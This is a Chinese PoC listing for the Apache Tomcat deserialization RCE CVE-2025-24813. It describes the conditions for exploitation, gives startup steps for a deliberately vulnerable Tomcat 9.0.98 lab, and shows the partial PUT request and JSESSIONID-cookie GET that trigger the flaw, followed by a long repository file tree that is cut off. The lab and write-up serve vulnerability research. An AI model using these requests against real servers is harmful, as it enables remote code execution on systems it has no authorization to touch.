POC详情: 12b36196bbed45f934c88f40c88990efe3989464

来源
关联漏洞
标题: Apache Tomcat 环境问题漏洞 (CVE-2025-24813)
描述:Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。用于实现对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat 11.0.0-M1至11.0.2版本、10.1.0-M1至10.1.34版本和9.0.0.M1至9.0.98版本存在环境问题漏洞。攻击者利用该漏洞可以远程执行代码或泄露敏感信息。
描述
tomcat CVE-2025-24813 反序列化RCE环境
介绍
## 说明
本仓库是针对 CVE-2025-24813 Tomcat 最新 RCE 复现的环境。

**仅供学习研究使用!**

## 利用条件
- 应用程序启用了DefaultServlet写入功能,该功能默认关闭
- 应用支持了 partial PUT 请求,能够将恶意的序列化数据写入到会话文件中,该功能默认开启
- 应用使用了 Tomcat 的文件会话持久化并且使用了默认的会话存储位置,需要额外配置
- 应用中包含一个存在反序列化漏洞的库,比如存在于类路径下的 commons-collections,此条件取决于业务实现是否依赖存在反序列化利用链的库

**本环境已开启上述复现所需条件**

## 启动 tomcat

Linux:

```bash
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run
```

Windows:
```bash
apache-tomcat-9.0.98/bin/catalina.bat run
```

访问:http://127.0.0.1:9001/

<img width="1452" alt="image" src="https://github.com/user-attachments/assets/2fc5508a-906b-4161-b965-ca937de94893" />

## POC

生成一个恶意的序列化文件,使用以下数据包上传,需要注意 Range 的分块值需要与 Length 保持一致,且大于当前文件的长度。

```poc
PUT /xxxxx/session HTTP/1.1  
Host: 192.168.131.32:8080  
Content-Length: 1000  
Content-Range: bytes 0-1000/1200  

{{反序列化文件内容)}}
```



使用如下 poc 触发:
```poc
GET / HTTP/1.1  
Host: 192.168.131.32:8080  
Cookie: JSESSIONID=.xxxxx
```
<img width="1392" alt="image" src="https://github.com/user-attachments/assets/1d9aa484-d151-45a6-bdff-7952af277c89" />
<img width="1379" alt="image" src="https://github.com/user-attachments/assets/9bacb253-0b76-4f16-9a5a-c123eb6fca73" />

参考:https://forum.butian.net/article/674
文件快照

[4.0K] /data/pocs/12b36196bbed45f934c88f40c88990efe3989464 ├── [4.0K] apache-tomcat-9.0.98 │   ├── [4.0K] bin │   │   ├── [ 35K] bootstrap.jar │   │   ├── [ 16K] catalina.bat │   │   ├── [ 25K] catalina.sh │   │   ├── [1.7K] catalina-tasks.xml │   │   ├── [2.1K] ciphers.bat │   │   ├── [2.0K] ciphers.sh │   │   ├── [ 25K] commons-daemon.jar │   │   ├── [209K] commons-daemon-native.tar.gz │   │   ├── [2.0K] configtest.bat │   │   ├── [1.9K] configtest.sh │   │   ├── [8.9K] daemon.sh │   │   ├── [2.0K] digest.bat │   │   ├── [1.9K] digest.sh │   │   ├── [3.5K] makebase.bat │   │   ├── [3.3K] makebase.sh │   │   ├── [3.7K] setclasspath.bat │   │   ├── [4.2K] setclasspath.sh │   │   ├── [2.0K] shutdown.bat │   │   ├── [1.9K] shutdown.sh │   │   ├── [2.0K] startup.bat │   │   ├── [1.9K] startup.sh │   │   ├── [ 48K] tomcat-juli.jar │   │   ├── [338K] tomcat-native.tar.gz │   │   ├── [4.5K] tool-wrapper.bat │   │   ├── [5.4K] tool-wrapper.sh │   │   ├── [2.0K] version.bat │   │   └── [1.9K] version.sh │   ├── [ 21K] BUILDING.txt │   ├── [4.0K] conf │   │   ├── [ 13K] catalina.policy │   │   ├── [7.7K] catalina.properties │   │   ├── [1.6K] context.xml │   │   ├── [1.1K] jaspic-providers.xml │   │   ├── [2.3K] jaspic-providers.xsd │   │   ├── [4.0K] logging.properties │   │   ├── [8.0K] server.xml │   │   ├── [2.7K] tomcat-users.xml │   │   ├── [2.6K] tomcat-users.xsd │   │   └── [174K] web.xml │   ├── [6.2K] CONTRIBUTING.md │   ├── [4.0K] lib │   │   ├── [ 13K] annotations-api.jar │   │   ├── [ 53K] catalina-ant.jar │   │   ├── [124K] catalina-ha.jar │   │   ├── [1.7M] catalina.jar │   │   ├── [ 62K] catalina-ssi.jar │   │   ├── [ 78K] catalina-storeconfig.jar │   │   ├── [333K] catalina-tribes.jar │   │   ├── [3.0M] ecj-4.20.jar │   │   ├── [ 88K] el-api.jar │   │   ├── [172K] jasper-el.jar │   │   ├── [564K] jasper.jar │   │   ├── [ 27K] jaspic-api.jar │   │   ├── [ 72K] jsp-api.jar │   │   ├── [279K] servlet-api.jar │   │   ├── [ 11K] tomcat-api.jar │   │   ├── [300K] tomcat-coyote-ffm.jar │   │   ├── [976K] tomcat-coyote.jar │   │   ├── [339K] tomcat-dbcp.jar │   │   ├── [ 72K] tomcat-i18n-cs.jar │   │   ├── [ 80K] tomcat-i18n-de.jar │   │   ├── [106K] tomcat-i18n-es.jar │   │   ├── [180K] tomcat-i18n-fr.jar │   │   ├── [204K] tomcat-i18n-ja.jar │   │   ├── [192K] tomcat-i18n-ko.jar │   │   ├── [ 55K] tomcat-i18n-pt-BR.jar │   │   ├── [ 67K] tomcat-i18n-ru.jar │   │   ├── [177K] tomcat-i18n-zh-CN.jar │   │   ├── [151K] tomcat-jdbc.jar │   │   ├── [ 38K] tomcat-jni.jar │   │   ├── [229K] tomcat-util.jar │   │   ├── [223K] tomcat-util-scan.jar │   │   ├── [244K] tomcat-websocket.jar │   │   └── [ 39K] websocket-api.jar │   ├── [ 57K] LICENSE │   ├── [4.0K] logs │   │   ├── [ 38K] catalina.2025-06-21.log │   │   ├── [ 0] host-manager.2025-06-21.log │   │   ├── [ 24K] localhost.2025-06-21.log │   │   ├── [3.6K] localhost_access_log.2025-06-21.txt │   │   └── [ 0] manager.2025-06-21.log │   ├── [2.3K] NOTICE │   ├── [3.3K] README.md │   ├── [6.9K] RELEASE-NOTES │   ├── [ 17K] RUNNING.txt │   ├── [4.0K] temp │   │   └── [ 0] safeToDelete.tmp │   ├── [4.0K] webapps │   │   ├── [4.0K] docs │   │   │   ├── [7.1K] aio.html │   │   │   ├── [4.0K] annotationapi │   │   │   │   └── [1.2K] index.html │   │   │   ├── [4.0K] api │   │   │   │   └── [1.2K] index.html │   │   │   ├── [4.0K] appdev │   │   │   │   ├── [ 17K] build.xml.txt │   │   │   │   ├── [ 14K] deployment.html │   │   │   │   ├── [4.0K] index.html │   │   │   │   ├── [4.9K] installation.html │   │   │   │   ├── [5.0K] introduction.html │   │   │   │   ├── [ 14K] processes.html │   │   │   │   ├── [4.0K] sample │   │   │   │   │   ├── [ 17K] build.xml │   │   │   │   │   ├── [4.0K] docs │   │   │   │   │   │   └── [ 857] README.txt │   │   │   │   │   ├── [2.2K] index.html │   │   │   │   │   ├── [4.5K] sample.war │   │   │   │   │   ├── [4.0K] src │   │   │   │   │   │   └── [4.0K] mypackage │   │   │   │   │   │   └── [3.0K] Hello.java │   │   │   │   │   └── [4.0K] web │   │   │   │   │   ├── [1.2K] hello.jsp │   │   │   │   │   ├── [4.0K] images │   │   │   │   │   │   └── [2.0K] tomcat.gif │   │   │   │   │   ├── [1.4K] index.html │   │   │   │   │   └── [4.0K] WEB-INF │   │   │   │   │   └── [1.6K] web.xml │   │   │   │   ├── [ 16K] source.html │   │   │   │   └── [6.3K] web.xml.txt │   │   │   ├── [ 11K] apr.html │   │   │   ├── [4.0K] architecture │   │   │   │   ├── [3.1K] index.html │   │   │   │   ├── [5.9K] overview.html │   │   │   │   ├── [4.0K] requestProcess │   │   │   │   │   ├── [ 42K] authentication-process.png │   │   │   │   │   └── [107K] request-process.png │   │   │   │   ├── [3.0K] requestProcess.html │   │   │   │   ├── [4.0K] startup │   │   │   │   │   ├── [2.0K] 1_overview.plantuml │   │   │   │   │   ├── [ 53K] 1_overview.png │   │   │   │   │   ├── [2.8K] 2_catalina_init.plantuml │   │   │   │   │   ├── [126K] 2_catalina_init.png │   │   │   │   │   ├── [3.2K] 3_catalina_start_1.plantuml │   │   │   │   │   ├── [167K] 3_catalina_start_1.png │   │   │   │   │   ├── [3.0K] 4_catalina_start_2.plantuml │   │   │   │   │   ├── [142K] 4_catalina_start_2.png │   │   │   │   │   ├── [4.2K] 5_catalina_start_3.plantuml │   │   │   │   │   ├── [260K] 5_catalina_start_3.png │   │   │   │   │   ├── [2.0K] 6_catalina_host_config.plantuml │   │   │   │   │   ├── [ 64K] 6_catalina_host_config.png │   │   │   │   │   ├── [2.7K] 7_catalina_context_config.plantuml │   │   │   │   │   ├── [ 88K] 7_catalina_context_config.png │   │   │   │   │   └── [8.5K] serverStartup.txt │   │   │   │   └── [4.7K] startup.html │   │   │   ├── [5.6K] balancer-howto.html │   │   │   ├── [ 13K] building.html │   │   │   ├── [ 21K] BUILDING.txt │   │   │   ├── [ 11K] cdi.html │   │   │   ├── [ 12K] cgi-howto.html │   │   │   ├── [892K] changelog.html │   │   │   ├── [ 19K] class-loader-howto.html │   │   │   ├── [ 43K] cluster-howto.html │   │   │   ├── [8.1K] comments.html │   │   │   ├── [4.0K] config │   │   │   │   ├── [ 55K] ajp.html │   │   │   │   ├── [ 21K] automatic-deployment.html │   │   │   │   ├── [ 10K] cluster-channel.html │   │   │   │   ├── [8.3K] cluster-deployer.html │   │   │   │   ├── [ 15K] cluster.html │   │   │   │   ├── [ 26K] cluster-interceptor.html │   │   │   │   ├── [5.0K] cluster-listener.html │   │   │   │   ├── [ 24K] cluster-manager.html │   │   │   │   ├── [ 22K] cluster-membership.html │   │   │   │   ├── [ 13K] cluster-receiver.html │   │   │   │   ├── [ 15K] cluster-sender.html │   │   │   │   ├── [ 14K] cluster-valve.html │   │   │   │   ├── [ 81K] context.html │   │   │   │   ├── [ 14K] cookie-processor.html │   │   │   │   ├── [ 12K] credentialhandler.html │   │   │   │   ├── [ 15K] engine.html │   │   │   │   ├── [ 10K] executor.html │   │   │   │   ├── [107K] filter.html │   │   │   │   ├── [ 16K] globalresources.html │   │   │   │   ├── [ 38K] host.html │   │   │   │   ├── [ 21K] http2.html │   │   │   │   ├── [135K] http.html │   │   │   │   ├── [6.9K] index.html │   │   │   │   ├── [ 11K] jar-scan-filter.html │   │   │   │   ├── [9.0K] jar-scanner.html │   │   │   │   ├── [ 12K] jaspic.html │   │   │   │   ├── [ 48K] listeners.html │   │   │   │   ├── [10.0K] loader.html │   │   │   │   ├── [ 36K] manager.html │   │   │   │   ├── [ 75K] realm.html │   │   │   │   ├── [ 20K] resources.html │   │   │   │   ├── [9.3K] server.html │   │   │   │   ├── [7.3K] service.html │   │   │   │   ├── [8.1K] sessionidgenerator.html │   │   │   │   ├── [ 39K] systemprops.html │   │   │   │   └── [149K] valve.html │   │   │   ├── [6.7K] connectors.html │   │   │   ├── [ 18K] default-servlet.html │   │   │   ├── [ 21K] deployer-howto.html │   │   │   ├── [6.6K] developers.html │   │   │   ├── [4.0K] elapi │   │   │   │   └── [1.2K] index.html │   │   │   ├── [ 13K] graal.html │   │   │   ├── [ 14K] host-manager-howto.html │   │   │   ├── [ 12K] html-host-manager-howto.html │   │   │   ├── [ 28K] html-manager-howto.html │   │   │   ├── [4.0K] images │   │   │   │   ├── [1.0K] add.gif │   │   │   │   ├── [ 20K] asf-logo.svg │   │   │   │   ├── [ 394] code.gif │   │   │   │   ├── [ 85K] cors-flowchart.png │   │   │   │   ├── [ 608] design.gif │   │   │   │   ├── [ 261] docs.gif │   │   │   │   ├── [5.9K] docs-stylesheet.css │   │   │   │   ├── [ 345] fix.gif │   │   │   │   ├── [4.0K] fonts │   │   │   │   │   ├── [1.9K] fonts.css │   │   │   │   │   ├── [ 21K] OpenSans400italic.woff │   │   │   │   │   ├── [ 21K] OpenSans400.woff │   │   │   │   │   ├── [ 21K] OpenSans600italic.woff │   │   │   │   │   ├── [ 22K] OpenSans600.woff │   │   │   │   │   ├── [ 21K] OpenSans700italic.woff │   │   │   │   │   └── [ 22K] OpenSans700.woff │   │   │   │   ├── [2.0K] tomcat.gif │   │   │   │   ├── [5.0K] tomcat.png │   │   │   │   ├── [ 627] update.gif │   │   │   │   └── [ 43] void.gif │   │   │   ├── [ 15K] index.html │   │   │   ├── [ 16K] introduction.html │   │   │   ├── [ 23K] jasper-howto.html │   │   │   ├── [4.0K] jaspicapi │   │   │   │   └── [1.2K] index.html │   │   │   ├── [ 69K] jdbc-pool.html │   │   │   ├── [ 33K] jndi-datasource-examples-howto.html │   │   │   ├── [ 59K] jndi-resources-howto.html │   │   │   ├── [4.0K] jspapi │   │   │   │   └── [1.2K] index.html │   │   │   ├── [ 24K] logging.html │   │   │   ├── [ 76K] manager-howto.html │   │   │   ├── [6.1K] maven-jars.html │   │   │   ├── [ 11K] mbeans-descriptors.dtd │   │   │   ├── [6.4K] mbeans-descriptors-howto.html │   │   │   ├── [4.0K] META-INF │   │   │   │   └── [1021] context.xml │   │   │   ├── [ 39K] monitoring.html │   │   │   ├── [ 11K] proxy-howto.html │   │   │   ├── [ 62K] realm-howto.html │   │   │   ├── [6.9K] RELEASE-NOTES.txt │   │   │   ├── [ 37K] rewrite.html │   │   │   ├── [ 17K] RUNNING.txt │   │   │   ├── [ 39K] security-howto.html │   │   │   ├── [ 28K] security-manager-howto.html │   │   │   ├── [4.0K] servletapi │   │   │   │   └── [1.2K] index.html │   │   │   ├── [ 13K] setup.html │   │   │   ├── [ 18K] ssi-howto.html │   │   │   ├── [ 41K] ssl-howto.html │   │   │   ├── [4.0K] tribes │   │   │   │   ├── [2.4K] developers.html │   │   │   │   ├── [2.4K] faq.html │   │   │   │   ├── [2.4K] interceptors.html │   │   │   │   ├── [ 17K] introduction.html │   │   │   │   ├── [2.4K] membership.html │   │   │   │   ├── [2.4K] setup.html │   │   │   │   ├── [2.4K] status.html │   │   │   │   └── [2.4K] transport.html │   │   │   ├── [ 10K] virtual-hosting-howto.html │   │   │   ├── [4.0K] WEB-INF │   │   │   │   ├── [4.0K] jsp │   │   │   │   │   └── [1.7K] 403.jsp │   │   │   │   └── [1.3K] web.xml │   │   │   ├── [4.0K] websocketapi │   │   │   │   └── [1.2K] index.html │   │   │   ├── [ 14K] web-socket-howto.html │   │   │   ├── [ 21K] windows-auth-howto.html │   │   │   └── [ 26K] windows-service-howto.html │   │   ├── [4.0K] examples │   │   │   ├── [1.1K] index.html │   │   │   ├── [4.0K] jsp │   │   │   │   ├── [4.0K] async │   │   │   │   │   ├── [1.2K] async1.jsp │   │   │   │   │   ├── [1.4K] async1.jsp.html │   │   │   │   │   ├── [1.1K] async3.jsp │   │   │   │   │   ├── [1.2K] async3.jsp.html │   │   │   │   │   ├── [2.4K] index.jsp │   │   │   │   │   └── [2.6K] index.jsp.html │   │   │   │   ├── [4.0K] checkbox │   │   │   │   │   ├── [1.3K] check.html │   │   │   │   │   ├── [1.7K] checkresult.jsp │   │   │   │   │   ├── [1.9K] checkresult.jsp.html │   │   │   │   │   ├── [1.4K] CheckTest.html │   │   │   │   │   └── [1.4K] cresult.html │   │   │   │   ├── [4.0K] colors │   │   │   │   │   ├── [1.4K] clr.html │   │   │   │   │   ├── [2.5K] ColorGameBean.html │   │   │   │   │   ├── [1.5K] colors.html │   │   │   │   │   ├── [1.7K] colrs.jsp │   │   │   │   │   └── [1.9K] colrs.jsp.html │   │   │   │   ├── [4.0K] dates │   │   │   │   │   ├── [1.3K] date.html │   │   │   │   │   ├── [1.8K] date.jsp │   │   │   │   │   └── [2.0K] date.jsp.html │   │   │   │   ├── [4.0K] error │   │   │   │   │   ├── [1.3K] er.html │   │   │   │   │   ├── [1.4K] err.jsp │   │   │   │   │   ├── [1.6K] err.jsp.html │   │   │   │   │   ├── [1.3K] error.html │   │   │   │   │   ├── [ 990] errorpge.jsp │   │   │   │   │   └── [1.1K] errorpge.jsp.html │   │   │   │   ├── [4.0K] forward │   │   │   │   │   ├── [1.1K] forward.jsp │   │   │   │   │   ├── [1.2K] forward.jsp.html │   │   │   │   │   ├── [1.3K] fwd.html │   │   │   │   │   ├── [ 894] one.jsp │   │   │   │   │   ├── [1.0K] one.jsp.html │   │   │   │   │   └── [ 893] two.html │   │   │   │   ├── [4.0K] images │   │   │   │   │   ├── [ 292] code.gif │   │   │   │   │   ├── [1.2K] execute.gif │   │   │   │   │   └── [1.2K] return.gif │   │   │   │   ├── [4.0K] include │   │   │   │   │   ├── [ 834] foo.html │   │   │   │   │   ├── [ 839] foo.jsp │   │   │   │   │   ├── [ 960] foo.jsp.html │   │   │   │   │   ├── [1.3K] inc.html │   │   │   │   │   ├── [1.1K] include.jsp │   │   │   │   │   └── [1.3K] include.jsp.html │   │   │   │   ├── [ 14K] index.html │   │   │   │   ├── [4.0K] jsp2 │   │   │   │   │   ├── [4.0K] el │   │   │   │   │   │   ├── [1.3K] basic-arithmetic.html │   │   │   │   │   │   ├── [2.4K] basic-arithmetic.jsp │   │   │   │   │   │   ├── [2.8K] basic-arithmetic.jsp.html │   │   │   │   │   │   ├── [1.3K] basic-comparisons.html │   │   │   │   │   │   ├── [3.2K] basic-comparisons.jsp │   │   │   │   │   │   ├── [3.8K] basic-comparisons.jsp.html │   │   │   │   │   │   ├── [1.4K] composite.html │   │   │   │   │   │   ├── [4.0K] composite.jsp │   │   │   │   │   │   ├── [4.6K] composite.jsp.html │   │   │   │   │   │   ├── [1.4K] functions.html │   │   │   │   │   │   ├── [1.7K] Functions.java.html │   │   │   │   │   │   ├── [2.4K] functions.jsp │   │   │   │   │   │   ├── [2.8K] functions.jsp.html │   │   │   │   │   │   ├── [1.3K] implicit-objects.html │   │   │   │   │   │   ├── [3.5K] implicit-objects.jsp │   │   │   │   │   │   ├── [3.9K] implicit-objects.jsp.html │   │   │   │   │   │   ├── [1.6K] ValuesBean.java.html │   │   │   │   │   │   └── [2.7K] ValuesTag.java.html │   │   │   │   │   ├── [4.0K] jspattribute │   │   │   │   │   │   ├── [1.2K] FooBean.java.html │   │   │   │   │   │   ├── [1.3K] HelloWorldSimpleTag.java.html │   │   │   │   │   │   ├── [1.5K] jspattribute.html │   │   │   │   │   │   ├── [1.9K] jspattribute.jsp │   │   │   │   │   │   ├── [2.1K] jspattribute.jsp.html │   │   │   │   │   │   ├── [1.5K] shuffle.html │   │   │   │   │   │   ├── [3.5K] shuffle.jsp │   │   │   │   │   │   ├── [3.8K] shuffle.jsp.html │   │   │   │   │   │   ├── [3.0K] ShuffleSimpleTag.java.html │   │   │   │   │   │   └── [1.7K] TileSimpleTag.java.html │   │   │   │   │   ├── [4.0K] jspx │   │   │   │   │   │   ├── [1.2K] basic.html │   │   │   │   │   │   ├── [2.2K] basic.jspx │   │   │   │   │   │   ├── [2.4K] basic.jspx.html │   │   │   │   │   │   ├── [2.0K] svgexample.html │   │   │   │   │   │   ├── [1.2K] textRotate.html │   │   │   │   │   │   ├── [ 26K] textRotate.jpg │   │   │   │   │   │   ├── [2.5K] textRotate.jspx │   │   │   │   │   │   └── [2.7K] textRotate.jspx.html │   │   │   │   │   ├── [4.0K] misc │   │   │   │   │   │   ├── [ 885] coda.jspf │   │   │   │   │   │   ├── [1023] coda.jspf.html │   │   │   │   │   │   ├── [1.5K] config.html │   │   │   │   │   │   ├── [1.6K] config.jsp │   │   │   │   │   │   ├── [1.8K] config.jsp.html │   │   │   │   │   │   ├── [1.4K] dynamicattrs.html │   │   │   │   │   │   ├── [1.6K] dynamicattrs.jsp │   │   │   │   │   │   ├── [1.8K] dynamicattrs.jsp.html │   │   │   │   │   │   ├── [2.1K] EchoAttributesTag.java.html │   │   │   │   │   │   ├── [ 888] prelude.jspf │   │   │   │   │   │   └── [1.0K] prelude.jspf.html │   │   │   │   │   ├── [4.0K] simpletag │   │   │   │   │   │   ├── [1.4K] BookBean.java.html │   │   │   │   │   │   ├── [1.6K] book.html │   │   │   │   │   │   ├── [1.9K] book.jsp │   │   │   │   │   │   ├── [2.2K] book.jsp.html │   │   │   │   │   │   ├── [1.7K] FindBookSimpleTag.java.html │   │   │   │   │   │   ├── [1.7K] Functions.java.html │   │   │   │   │   │   ├── [1.4K] hello.html │   │   │   │   │   │   ├── [1.2K] hello.jsp │   │   │   │   │   │   ├── [1.4K] hello.jsp.html │   │   │   │   │   │   ├── [1.3K] HelloWorldSimpleTag.java.html │   │   │   │   │   │   ├── [1.4K] repeat.html │   │   │   │   │   │   ├── [1.7K] repeat.jsp │   │   │   │   │   │   ├── [1.9K] repeat.jsp.html │   │   │   │   │   │   └── [1.6K] RepeatSimpleTag.java.html │   │   │   │   │   └── [4.0K] tagfiles │   │   │   │   │   ├── [2.3K] displayProducts.tag.html │   │   │   │   │   ├── [1.4K] hello.html │   │   │   │   │   ├── [1.4K] hello.jsp │   │   │   │   │   ├── [1.6K] hello.jsp.html │   │   │   │   │   ├── [ 936] helloWorld.tag.html │   │   │   │   │   ├── [1.4K] panel.html │   │   │   │   │   ├── [2.2K] panel.jsp │   │   │   │   │   ├── [2.4K] panel.jsp.html │   │   │   │   │   ├── [1.2K] panel.tag.html │   │   │   │   │   ├── [1.4K] products.html │   │   │   │   │   ├── [2.1K] products.jsp │   │   │   │   │   └── [2.3K] products.jsp.html │   │   │   │   ├── [4.0K] jsptoserv │   │   │   │   │   ├── [ 961] hello.jsp │   │   │   │   │   ├── [1.1K] hello.jsp.html │   │   │   │   │   ├── [ 916] jsptoservlet.jsp │   │   │   │   │   ├── [1.0K] jsptoservlet.jsp.html │   │   │   │   │   ├── [1.3K] jts.html │   │   │   │   │   └── [1.6K] ServletToJsp.java.html │   │   │   │   ├── [4.0K] num │   │   │   │   │   ├── [1.4K] numguess.html │   │   │   │   │   ├── [2.0K] numguess.jsp │   │   │   │   │   └── [2.2K] numguess.jsp.html │   │   │   │   ├── [4.0K] security │   │   │   │   │   └── [4.0K] protected │   │   │   │   │   ├── [1.0K] error.jsp │   │   │   │   │   ├── [1.2K] error.jsp.html │   │   │   │   │   ├── [5.6K] index.jsp │   │   │   │   │   ├── [6.1K] index.jsp.html │   │   │   │   │   ├── [1.4K] login.jsp │   │   │   │   │   └── [1.6K] login.jsp.html │   │   │   │   ├── [4.0K] sessions │   │   │   │   │   ├── [1.3K] carts.jsp │   │   │   │   │   ├── [1.4K] carts.jsp.html │   │   │   │   │   ├── [1.5K] crt.html │   │   │   │   │   ├── [1.4K] DummyCart.html │   │   │   │   │   ├── [1.3K] shopping.jsp │   │   │   │   │   └── [1.5K] shopping.jsp.html │   │   │   │   ├── [4.0K] simpletag │   │   │   │   │   ├── [1.3K] foo.html │   │   │   │   │   ├── [1.2K] foo.jsp │   │   │   │   │   └── [1.3K] foo.jsp.html │   │   │   │   ├── [4.0K] snp │   │   │   │   │   ├── [1.3K] snoop.html │   │   │   │   │   ├── [2.0K] snoop.jsp │   │   │   │   │   └── [2.3K] snoop.jsp.html │   │   │   │   ├── [4.0K] tagplugin │   │   │   │   │   ├── [1.2K] choose.html │   │   │   │   │   ├── [1.6K] choose.jsp │   │   │   │   │   ├── [1.9K] choose.jsp.html │   │   │   │   │   ├── [1.2K] foreach.html │   │   │   │   │   ├── [1.7K] foreach.jsp │   │   │   │   │   ├── [1.9K] foreach.jsp.html │   │   │   │   │   ├── [1.6K] howto.html │   │   │   │   │   ├── [1.2K] if.html │   │   │   │   │   ├── [1.6K] if.jsp │   │   │   │   │   ├── [1.8K] if.jsp.html │   │   │   │   │   └── [1.7K] notes.html │   │   │   │   └── [4.0K] xml │   │   │   │   ├── [1.3K] xml.html │   │   │   │   ├── [2.1K] xml.jsp │   │   │   │   └── [2.3K] xml.jsp.html │   │   │   ├── [4.0K] META-INF │   │   │   │   └── [1.1K] context.xml │   │   │   ├── [4.0K] servlets │   │   │   │   ├── [2.7K] cookies.html │   │   │   │   ├── [2.6K] helloworld.html │   │   │   │   ├── [4.0K] images │   │   │   │   │   ├── [ 292] code.gif │   │   │   │   │   ├── [1.2K] execute.gif │   │   │   │   │   └── [1.2K] return.gif │   │   │   │   ├── [6.6K] index.html │   │   │   │   ├── [4.0K] nonblocking │   │   │   │   │   └── [1.4K] bytecounter.html │   │   │   │   ├── [2.2K] reqheaders.html │   │   │   │   ├── [3.6K] reqinfo.html │   │   │   │   ├── [4.7K] reqparams.html │   │   │   │   └── [3.2K] sessions.html │   │   │   ├── [4.0K] WEB-INF │   │   │   │   ├── [4.0K] classes │   │   │   │   │   ├── [4.0K] async │   │   │   │   │   │   ├── [1.7K] Async0$1.class │   │   │   │   │   │   ├── [2.8K] Async0.class │   │   │   │   │   │   ├── [2.9K] Async0.java │   │   │   │   │   │   ├── [1.7K] Async1$1.class │   │   │   │   │   │   ├── [1.5K] Async1.class │   │   │   │   │   │   ├── [2.2K] Async1.java │   │   │   │   │   │   ├── [2.2K] Async2$1.class │   │   │   │   │   │   ├── [1.5K] Async2.class │   │   │   │   │   │   ├── [2.5K] Async2.java │   │   │   │   │   │   ├── [1015] Async3.class │   │   │   │   │   │   ├── [1.4K] Async3.java │   │   │   │   │   │   ├── [1.2K] AsyncStockContextListener.class │   │   │   │   │   │   ├── [1.7K] AsyncStockContextListener.java │   │   │   │   │   │   ├── [4.9K] AsyncStockServlet.class │   │   │   │   │   │   ├── [5.0K] AsyncStockServlet.java │   │   │   │   │   │   ├── [2.6K] Stockticker$Stock.class │   │   │   │   │   │   ├── [ 307] Stockticker$TickListener.class │   │   │   │   │   │   ├── [3.3K] Stockticker.class │   │   │   │   │   │   └── [6.7K] Stockticker.java │   │   │   │   │   ├── [4.0K] checkbox │   │   │   │   │   │   ├── [ 604] CheckTest.class │   │   │   │   │   │   └── [1.0K] CheckTest.java │   │   │   │   │   ├── [4.0K] colors │   │   │   │   │   │   ├── [2.1K] ColorGameBean.class │   │   │   │   │   │   └── [3.0K] ColorGameBean.java │   │   │   │   │   ├── [4.0K] compressionFilters │   │   │   │   │   │   ├── [4.9K] CompressionFilter.class │   │   │   │   │   │   ├── [8.1K] CompressionFilter.java │   │   │   │   │   │   ├── [2.0K] CompressionFilterTestServlet.class │   │   │   │   │   │   ├── [2.4K] CompressionFilterTestServlet.java │   │   │   │   │   │   ├── [6.5K] CompressionResponseStream.class │   │   │   │   │   │   ├── [ 13K] CompressionResponseStream.java │   │   │   │   │   │   ├── [5.2K] CompressionServletResponseWrapper.class │   │   │   │   │   │   └── [8.6K] CompressionServletResponseWrapper.java │   │   │   │   │   ├── [4.4K] CookieExample.class │   │   │   │   │   ├── [4.8K] CookieExample.java │   │   │   │   │   ├── [4.0K] dates │   │   │   │   │   │   ├── [4.0K] JspCalendar.class │   │   │   │   │   │   └── [4.3K] JspCalendar.java │   │   │   │   │   ├── [4.0K] error │   │   │   │   │   │   ├── [ 521] Smart.class │   │   │   │   │   │   └── [1.0K] Smart.java │   │   │   │   │   ├── [4.0K] examples │   │   │   │   │   │   ├── [1.4K] ExampleTagBase.class │   │   │   │   │   │   ├── [2.1K] ExampleTagBase.java │   │   │   │   │   │   ├── [1.9K] FooTag.class │   │   │   │   │   │   ├── [ 658] FooTagExtraInfo.class │   │   │   │   │   │   ├── [1.3K] FooTagExtraInfo.java │   │   │   │   │   │   ├── [2.3K] FooTag.java │   │   │   │   │   │   ├── [1.5K] LogTag.class │   │   │   │   │   │   ├── [1.9K] LogTag.java │   │   │   │   │   │   ├── [2.0K] ValuesTag.class │   │   │   │   │   │   └── [2.6K] ValuesTag.java │   │   │   │   │   ├── [4.0K] filters │   │   │   │   │   │   ├── [2.0K] ExampleFilter.class │   │   │   │   │   │   └── [3.3K] ExampleFilter.java │   │   │   │   │   ├── [2.2K] HelloWorldExample.class │   │   │   │   │   ├── [2.8K] HelloWorldExample.java │   │   │   │   │   ├── [4.0K] http2 │   │   │   │   │   │   ├── [2.1K] SimpleImagePush.class │   │   │   │   │   │   └── [2.2K] SimpleImagePush.java │   │   │   │   │   ├── [4.0K] jsp2 │   │   │   │   │   │   └── [4.0K] examples │   │   │   │   │   │   ├── [ 736] BookBean.class │   │   │   │   │   │   ├── [1.3K] BookBean.java │   │   │   │   │   │   ├── [4.0K] el │   │   │   │   │   │   │   ├── [1.1K] Functions.class │   │   │   │   │   │   │   └── [1.5K] Functions.java │   │   │   │   │   │   ├── [ 554] FooBean.class │   │   │   │   │   │   ├── [1.1K] FooBean.java │   │   │   │   │   │   ├── [4.0K] simpletag │   │   │   │   │   │   │   ├── [1.9K] EchoAttributesTag.class │   │   │   │   │   │   │   ├── [1.9K] EchoAttributesTag.java │   │   │   │   │   │   │   ├── [1.1K] FindBookSimpleTag.class │   │   │   │   │   │   │   ├── [1.6K] FindBookSimpleTag.java │   │   │   │   │   │   │   ├── [ 764] HelloWorldSimpleTag.class │   │   │   │   │   │   │   ├── [1.2K] HelloWorldSimpleTag.java │   │   │   │   │   │   │   ├── [1.1K] RepeatSimpleTag.class │   │   │   │   │   │   │   ├── [1.4K] RepeatSimpleTag.java │   │   │   │   │   │   │   ├── [1.5K] ShuffleSimpleTag.class │   │   │   │   │   │   │   ├── [2.9K] ShuffleSimpleTag.java │   │   │   │   │   │   │   ├── [1.2K] TileSimpleTag.class │   │   │   │   │   │   │   └── [1.6K] TileSimpleTag.java │   │   │   │   │   │   ├── [ 983] ValuesBean.class │   │   │   │   │   │   └── [1.5K] ValuesBean.java │   │   │   │   │   ├── [4.0K] listeners │   │   │   │   │   │   ├── [2.2K] ContextListener.class │   │   │   │   │   │   ├── [3.9K] ContextListener.java │   │   │   │   │   │   ├── [2.8K] SessionListener.class │   │   │   │   │   │   └── [4.7K] SessionListener.java │   │   │   │   │   ├── [1.3K] LocalStrings_cs.properties │   │   │   │   │   ├── [1.3K] LocalStrings_de.properties │   │   │   │   │   ├── [2.2K] LocalStrings_es.properties │   │   │   │   │   ├── [2.3K] LocalStrings_fr.properties │   │   │   │   │   ├── [3.0K] LocalStrings_ja.properties │   │   │   │   │   ├── [2.9K] LocalStrings_ko.properties │   │   │   │   │   ├── [2.1K] LocalStrings.properties │   │   │   │   │   